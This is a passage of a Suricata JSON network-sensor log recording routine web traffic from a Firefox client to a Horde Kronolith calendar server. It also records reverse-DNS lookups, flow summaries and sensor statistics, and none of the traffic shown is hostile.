Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":303},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/workweekview.png","state":"CLOSED","stored":false,"size":303,"tx_id":9}} {"timestamp":"2020-02-29T00:26:20.088703+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53158,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/tasks.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/tasks.png","state":"CLOSED","stored":false,"size":614,"tx_id":5}} {"timestamp":"2020-02-29T00:26:20.125287+0000","flow_id":1460171568849225,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53156,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/yearview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":301}} {"timestamp":"2020-02-29T00:26:20.129244+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":13,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/dayview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":349}} {"timestamp":"2020-02-29T00:26:20.129190+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53158,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87}} {"timestamp":"2020-02-29T00:26:20.129324+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidevert-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87}} {"timestamp":"2020-02-29T00:26:20.153731+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/dayview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":349},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/dayview.png","state":"CLOSED","stored":false,"size":349,"tx_id":13}} {"timestamp":"2020-02-29T00:26:20.154066+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":14,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742}} {"timestamp":"2020-02-29T00:26:20.201408+0000","flow_id":1375831296053952,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":40121,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":24589,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:26:20.234800+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/favicon.ico","state":"CLOSED","stored":false,"size":1742,"tx_id":14}} {"timestamp":"2020-02-29T00:26:20.309691+0000","flow_id":1375831296053952,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40121,"proto":"UDP","dns":{"type":"answer","id":24589,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:26:20.309691+0000","flow_id":1375831296053952,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40121,"proto":"UDP","dns":{"type":"answer","id":24589,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:26:20.364046+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":15,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":638}} {"timestamp":"2020-02-29T00:26:20.364046+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":638},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":29,"tx_id":15}} {"timestamp":"2020-02-29T00:26:20.398232+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":638},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":1692,"tx_id":15}} {"timestamp":"2020-02-29T00:26:20.409015+0000","flow_id":1007619454811575,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":36501,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64994,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:26:20.418063+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidevert-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/slidevert-bg.png","state":"CLOSED","stored":false,"size":87,"tx_id":10}} {"timestamp":"2020-02-29T00:26:20.418385+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/loading.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2494}} {"timestamp":"2020-02-29T00:26:20.424480+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/loading.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2494},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/loading.gif","state":"CLOSED","stored":false,"size":2494,"tx_id":11}} {"timestamp":"2020-02-29T00:26:20.425560+0000","flow_id":1673743112610025,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53154,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/new.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":560},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/new.png","state":"CLOSED","stored":false,"size":560,"tx_id":0}} {"timestamp":"2020-02-29T00:26:20.425832+0000","flow_id":1673743112610025,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53154,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/collapse.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":227}} {"timestamp":"2020-02-29T00:26:20.426617+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/plus-sidebar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":515}} {"timestamp":"2020-02-29T00:26:20.427177+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/plus-sidebar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":515},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/plus-sidebar.png","state":"CLOSED","stored":false,"size":515,"tx_id":12}} {"timestamp":"2020-02-29T00:26:20.428292+0000","flow_id":1673743112610025,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53154,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/collapse.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":227},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/collapse.png","state":"CLOSED","stored":false,"size":227,"tx_id":1}} {"timestamp":"2020-02-29T00:26:20.434804+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":13,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/edit-sidebar-fff.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":220}} {"timestamp":"2020-02-29T00:26:20.435318+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/edit-sidebar-fff.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":220},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/edit-sidebar-fff.png","state":"CLOSED","stored":false,"size":220,"tx_id":13}} {"timestamp":"2020-02-29T00:26:20.442759+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53158,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/sidebar-split.png","state":"CLOSED","stored":false,"size":87,"tx_id":6}} {"timestamp":"2020-02-29T00:26:20.469468+0000","flow_id":1673743112610025,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53154,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/checkbox_on.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":477}} {"timestamp":"2020-02-29T00:26:20.477306+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":14,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/expand.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":234}} {"timestamp":"2020-02-29T00:26:20.517292+0000","flow_id":1007619454811575,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36501,"proto":"UDP","dns":{"type":"answer","id":64994,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:26:20.517292+0000","flow_id":1007619454811575,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36501,"proto":"UDP","dns":{"type":"answer","id":64994,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:26:20.562334+0000","flow_id":1489093878650014,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45312,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":45910,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:26:20.670412+0000","flow_id":1489093878650014,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45312,"proto":"UDP","dns":{"type":"answer","id":45910,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:26:20.670412+0000","flow_id":1489093878650014,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45312,"proto":"UDP","dns":{"type":"answer","id":45910,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:26:20.697573+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53158,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126}} {"timestamp":"2020-02-29T00:26:20.697573+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":53158,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":137,"tx_id":7}} {"timestamp":"2020-02-29T00:26:20.697674+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":16,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1142}} {"timestamp":"2020-02-29T00:26:20.697674+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1142},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":128,"tx_id":16}} {"timestamp":"2020-02-29T00:26:25.089026+0000","flow_id":1460171568849225,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53156,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/yearview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":301},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/yearview.png","state":"CLOSED","stored":false,"size":301,"tx_id":2}} {"timestamp":"2020-02-29T00:26:25.431617+0000","flow_id":1673743112610025,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53154,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/checkbox_on.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":477},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/checkbox_on.png","state":"CLOSED","stored":false,"size":477,"tx_id":2}} {"timestamp":"2020-02-29T00:26:25.438988+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/expand.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":234},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/expand.png","state":"CLOSED","stored":false,"size":234,"tx_id":14}} {"timestamp":"2020-02-29T00:26:25.698314+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1142},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":3311,"tx_id":16}} {"timestamp":"2020-02-29T00:26:25.701587+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53158,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":115,"tx_id":7}} {"timestamp":"2020-02-29T00:26:27.000360+0000","event_type":"stats","stats":{"uptime":15239,"capture":{"kernel_packets":142113,"kernel_drops":0},"decoder":{"pkts":142127,"bytes":97637978,"invalid":195,"ipv4":140532,"ipv6":10,"ethernet":142127,"raw":0,"null":0,"sll":0,"tcp":134944,"udp":5378,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7087840},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2915,"ssn_memcap_drop":0,"pseudo":355,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2931,"synack":2922,"rst":1223,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1921,"ftp":0,"smtp":0,"tls":787,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2460,"failed_udp":116},"tx":{"http":5021,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2544}},"flow_mgr":{"closed_pruned":2893,"new_pruned":17,"est_pruned":2545,"bypassed_pruned":0,"flows_checked":9,"flows_notimeout":8,"flows_timeout":1,"flows_timeout_inuse":1,"flows_removed":0,"rows_checked":65536,"rows_skipped":65527,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":10562,"memcap_state":0,"memcap_global":0},"http":{"memuse":800,"memcap":0}}} {"timestamp":"2020-02-29T00:26:27.001155+0000","flow_id":1291220436495971,"event_type":"flow","src_ip":"192.168.10.81","src_port":53136,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":774,"bytes_toclient":709,"start":"2020-02-29T00:25:21.831075+0000","end":"2020-02-29T00:25:26.839931+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:27.001644+0000","flow_id":1482449560383490,"event_type":"flow","src_ip":"192.168.10.81","src_port":53138,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":773,"bytes_toclient":767,"start":"2020-02-29T00:25:21.831490+0000","end":"2020-02-29T00:25:26.839893+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:27.955857+0000","flow_id":350253235803601,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49429,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":14196,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 